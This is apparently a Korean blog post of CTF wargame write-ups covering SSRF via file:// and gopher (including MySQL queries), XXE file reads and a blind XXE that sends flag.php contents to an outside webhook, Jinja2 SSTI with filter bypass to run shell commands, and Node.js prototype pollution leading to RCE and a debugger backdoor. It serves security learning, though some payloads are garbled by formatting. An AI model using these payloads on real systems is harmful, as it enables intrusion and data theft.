Wargame

MiniCTF_SSRF / XXE /SSTI

남바오 2023. 3. 17. 23:07

MiniCTF_SSRF 1번

소스코드를 보면 flag.txt에 존재 → 가장 기본적인 file 읽기 방법

file://flag.txt

MiniCTF_SSRF 2번

소스코드에 flag는 admin.php에 존재한다는 것과 preg_match를 통해서 어떤 형태의 값을 입력해야되는지 힌트를 얻을 수 있었다.

if (isset($_GET['url'])) {
    $result = 'Wrong URL.';
    if (preg_match("/^https?:\\/\\/.*/is", $_GET['url'])) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $_GET['url']);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);
            $result = curl_exec($ch);
            curl_close($ch);

MiniCTF_SSRF 3번

http://127.0.0.1/ssrf3/admin.php 에 flag 위치

gopher 사용해서 해결

POST /ssrf3/admin.php HTTP/1.1

Host: 127.0.0.1

ADMIN: admin

Cookie: admin=admin;

Content-Type:

Content-Length:

Connection:close

admin=admin

html 형식으로 아래와 같이 url로 보냈다.

\r\n : %0d%0a

‘ ‘ : %20

gopher://localhost:80/_POST%20/ssrf3/admin.php%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0aADMIN:%20admin%0d%0aCookie:%20admin=admin;%0d%0aContent-Type:%20application/x-www-form-urlencoded%0d%0aContent-Length:%2011%0d%0aConnection:%20close%0d%0a%0d%0aadmin=admin

MiniCTF_SSRF 4번

SSRF 취약점은 CSRF와 유사한 형태이지만 클라이언트가 아닌 서버에 직접 요청을 하는 것으로 서버 자체에서 데이터베이스에 접근하여 내용을 탈취하게 된다.

3번 문제를 gopher를 이용해서 풀었기 때문에 Gopher protocol을 이용해서 해결하였다.

소스코드를 보면 $conn = mysqli_connect('localhost','ssrf4','', 'ssrf4'); 라고 힌트가 나와있었다.

mysqli_connect([ip],[id],[db],[port]); 이기 때문에 고퍼 프로토콜에서

username을 ssrf4로 입력하고

SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES;

을 입력하였더니 테이블중에 flag가 있는 것이 확인되었다.

table
J 5.7.318RA%d%fp��<|-YDrt#,mysql_native_passwordHdefinformation_schemaTABLESTABLES TABLE_NAME TABLE_NAME!��CHARACTER_SETS COLLATIONS&%COLLATION_CHARACTER_SET_APPLICABILITYCOLUMNSCOLUMN_PRIVILEGESENGINES EVENTS FILES GLOBAL_STATUSGLOBAL_VARIABLES KEY_COLUMN_USAGEOPTIMIZER_TRACE PARAMETERS PARTITIONSPLUGINSPROCESSLIST PROFILINGREFERENTIAL_CONSTRAINTS ROUTINES SCHEMATASCHEMA_PRIVILEGESSESSION_STATUSSESSION_VARIABLES STATISTICSTABLESTABLESPACESTABLE_CONSTRAINTSTABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES!VIEWS "INNODB_LOCKS# INNODB_TRX$INNODB_SYS_DATAFILES%INNODB_FT_CONFIG&INNODB_SYS_VIRTUAL' INNODB_CMP(INNODB_FT_BEING_DELETED)INNODB_CMP_RESET*INNODB_CMP_PER_INDEX+INNODB_CMPMEM_RESET,INNODB_FT_DELETED-INNODB_BUFFER_PAGE_LRU.INNODB_LOCK_WAITS/INNODB_TEMP_TABLE_INFO0INNODB_SYS_INDEXES1INNODB_SYS_TABLES2INNODB_SYS_FIELDS3INNODB_CMP_PER_INDEX_RESET4INNODB_BUFFER_PAGE5INNODB_FT_DEFAULT_STOPWORD6INNODB_FT_INDEX_TABLE7INNODB_FT_INDEX_CACHE8INNODB_SYS_TABLESPACES9INNODB_METRICS:INNODB_SYS_FOREIGN_COLS; INNODB_CMPMEM<INNODB_BUFFER_POOL_STATS=INNODB_SYS_COLUMNS>INNODB_SYS_FOREIGN?INNODB_SYS_TABLESTATS@flagA�”’

테이블 이름을 확인하였기 때문에

SELECT * from flag 를 하였는데 결과가 나오지 않아 db명까지 붙여서 입력하였더니 flag를 얻을 수 있었다.

**SELECT * form ssrf4.flag**

MiniCTF_XXE 1번

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo[
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/xxe/index.php">]>
<userInfo>
  <email>John.Smith@gmail.com</email>
  <firstName>John</firstName>
  <lastName>&xxe;</lastName>
 </userInfo>

ENTITY 태그를 이용하여 외부 엔티티를 선언하고 선언한 xxe 엔티티를 참조하면 SYSTEM 키워드로

http://를 사용하여 외부 리소스를 참조해서 나온 값을 디코딩하여 flag를 얻을 수 있었다.

MiniCTF_XXE 2번

1번과 같은 방법을 실행해보았더니 어떤 php를 열어야 하는지 주석으로 힌트를 얻을 수 있었다.

flag.php → localhost 여야지 접근이 가능하다는 것을 알았다.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo[
<!ENTITY xxe SYSTEM "<http://localhost:80/xxe2/flag.php>">]>
<userInfo>
  <email>John.Smith@gmail.com</email>
  <firstName>John</firstName>
  <lastName>&xxe;</lastName>
 </userInfo>

MiniCTF_XXE 3번

XXE 취약점은 저장된 XML 데이터를 불러올 때 XML Parser에서 외부 엔티티를 사용하는 구분이 있다면 해당 내용을 읽고 데이터를 처리하는 것을 이용한 공격이다.

3번 문제는 2번과 달리 페이로드의 결과값이 나오지 않기 때문에 Blind XXE인 것을 생각하여 결과값을 나의 서버에 보내도록 문제를 해결하였다.

멘토님 강의자료에 있는 부분을 참고하여


">
  https://webhook.site/6adfd1d1-864c-4912-adeb-053aac308544/xxe.dtd>">
  %dtd;
]>

  John.Smith@gmail.com
  John
  &exfil

https://eoe4b2t4ui5w640.m.pipedream.net>](<https://eoe4b2t4ui5w640.m.pipedream.net/>)/data?%xxe;'>">
%eval;

우선, ENTITY xxe에 내가 보고 싶은 flag.php 경로를 저장하였고 oob에 exploit.xml 내용을 가져와서 저장하였다. 그리고 exploit.xml에서 나의 서버로 요청을 수행하는 ENTITY eval을 만든 후에 파라미터로 xxe를 넘겨서 저장한 내용으로 가져와 나의 서버에서 도메인 파라미터로 파일 내용일 붙어져서 보내진 것을 확인하였다.

MiniCTF_SSTI 1번

Jinja2 템플릿 문법에서 open(’ ‘,’rb’).read()가 불가하고,

파이썬은 다중상속을 지원한다는 것을 이용하여 해결하는 방법이었다.

MRO(method resolution order)를 이용해

{{“.__class__.__mro__[1].__subclasses__()}} 로 클래스들을 확인하고

그중 어떤 것이 open을 하는 클래스인지 찾아내어 flag를 찾아내었다.

[http://wuq.kr:8086/?user=111{{ ''.__class__.__mro__[1].__subclasses__()[408]}](<http://wuq.kr:8086/?user=111%7B%7B%20%27%27.__class__.__mro__%5B1%5D.__subclasses__()%5B408%5D%7D>)}

MiniCTF_SSTI 2번

해당 문제는 사용자의 인풋을 템플릿 코드로 해석할 때 발생하는 취약점으로 Jinja2 템플릿 엔진을 사용한다는 것을 공격 벡터로 이용했다.

우선 class중에서 popen 을 찾는 것을 시도해보았다.

똑같이 408번에 있었지만 필터링이 있기 때문에

[http://wuq.kr:8086/?user=111{{ ''.__class__.__mro__[1].__subclasses__()[408]}](<http://wuq.kr:8086/?user=111%7B%7B%20%27%27.__class__.__mro__%5B1%5D.__subclasses__()%5B408%5D%7D>)} 인 경우에 아무것도 출력되지 않았다. 이를 우회하는 방법을 사용하여

{{%20%27%27[%27__cl%27+%27ass__%27][%27__m%27+%27ro__%27][1][%27__subcla%27+%27sses__%27](notion://www.notion.so/Exploit-5942b3bb4c584997bbc3ece3571a7210)[408]%20}} 으로 popen을 실행시키고 ls-al 명령을 실행시켜보았더니 flag가 있는 부분은 읽기 권한은 없고 실행권한만 있는 것을 확인하였다.

[**<http://wuq.kr:8086/?user=111>{{ ''['__cl'+'ass__']['__m'+'ro__'][1]['__subcla'+'sses__']()[408]('./ssti2_flag',shell=True,stdout=-1).communicate()}](<http://wuq.kr:8086/?user=111%7B%7B%20%27%27%5B%27__cl%27+%27ass__%27%5D%5B%27__m%27+%27ro__%27%5D%5B1%5D%5B%27__subcla%27+%27sses__%27%5D()%5B408%5D(%27./ssti2_flag%27,shell=True,stdout=-1).communicate()%7D>)}**

Prototype Pollution

Prototype Pollution은 ****자바스크립트 처리 로직에서 발생하는 문제로 prototype을 수정할 수 있을 때 발생하는 취약점을 말한다.

자바스크립트의 자료형은 prototype 속성을 포함하는데 특정 객체/클래스의 prototype 데이터 변조가 가능하다면 이후 그 객체의 생성자를 통해 새로운 인스턴스를 생성할 때에 참조하는 prototype 객체의 속성이 변경되게 된다.

var inst = new Object();
inst.__proto__.isAdmin = true;
console.log(isAdmin); // true

위의 코드와 같이 특정 객체 클래스의 인스턴스를 proto 속성을 추가해주면 다음 생성될 인스턴스의 속성까지 영향이 가게된다. 또한, DOM과 Nodejs에서 사용하는 전역 변수 또한 객체를 상속하고 있기 때문에 이를 변조시킬 경우에 값이 임의로 조작되는 취약점이 발생할 수 있다.

Prototype Pollution을 이용하여 RCE를 유발하는 방법을 정리해보았다.

<aside> 💡 Code Execution

</aside>

Object.prototype.command = 'console.log("executed!")';
if (command) {
	eval(command);
}

접근하기 가장 쉬운 방법으로, 검증 과정 없이 eval 함수에 특정 변수를 인자로 하여 전달할 수 있다면 쉽게 RCE를 유발할 수 있는 방법이다.

<aside> 💡 Process spawning

</aside>

for (const key in env) {
    const value = env[key];
    if (value !== undefined) {
      envPairs.push(`${key}=${value}`);
    }
  }

Nodejs에 내장되어 있는 모듈로, 서브 프로세스를 생성하는 데에 사용되는 child_process 모듈은

자식 프로세스를 생성할 때, 환경 변수를 복사하는 과정을 거치게 되는데 복사 과정에서 for in 반복문을 사용하고 있기 때문에 객체 내부에 직접적으로 정의되지 않더라도 process.env의 프로토타입인 Object.prototype 객체가 오염된다면 환경 변수를 임의로 추가할 수 있게 된다.

NODE_OPTIONS='--require /proc/self/environ' node app.js
// same as
node --require /proc/self/environ app.js

Nodejs 프로세스가 실행될 때, 스크립트가 실행되기 이전에 쓰이는 환경 변수중의 하나로 NODE_OPTIONS 환경변수가 존재하는데 본 변수에 --require [argv] 와 같은 옵션을 추가하면 스크립트 실행에 --require [argv] 를 추가하여 실행한 것과 같은 효과를 얻을 수 있다.

const { exec, execSync, spawn, spawnSync, fork } = require('child_process');
  
// pollute
Object.prototype.env = {
	NODE_DEBUG : 'require("child_process").execSync("mkdir executed")//',
	NODE_OPTIONS : '-r /proc/self/environ'
};

// method 1
fork('blank');
// method 2
spawn('node', ['blank']).stdout.pipe(process.stdout);
// method 3
console.log(spawnSync('node', ['blank']).stdout.toString());
// method 4
console.log(execSync('node  blank').toString());

위의 예시는 child_process와 NODE_OPTIONS를 사용하여 RCE를 유발할 수 있는 코드이다.

환경 변수에 스크립트를 포함시키고 환경 변수가 저장되는 /proc/self/environ 파일을 옵션으로 지정하여 RCE를 유발할 수 있다.

/proc/sef/environ 을 이용하면 리눅스 서버에만 작동한다는 단점이 존재하기 때문에

--inspect-brk 옵션을 이용하면 윈도우에서도 이용이 가능하다.

위와 같은 옵션을 사용하면 해당 프로세스는 옵션에 설정된 포트로 디버거가 연결될 때까지 대기하며 백도어와 같은 역할을 하게 된다.

const { exec, execSync, spawn, spawnSync, fork } = require('child_process');
  
// pollute
Object.prototype.env = {
    NODE_OPTIONS : '--inspect-brk=0.0.0.0:1234'
};

// method 1
fork('blank');
// method 2
exec('node blank');
// method 3
execSync('node blank');
// method 4
spawn('node', ['blank']);
// method 5
spawnSync('node', ['blank']);

디버깅 포트가 열린다면 node inspect host:port 로 서버에 연결할 수 있다.

이후에 위와 같은 exec , execSync 과 같은 커맨드를 활용하여 RCE가 가능하게 된다.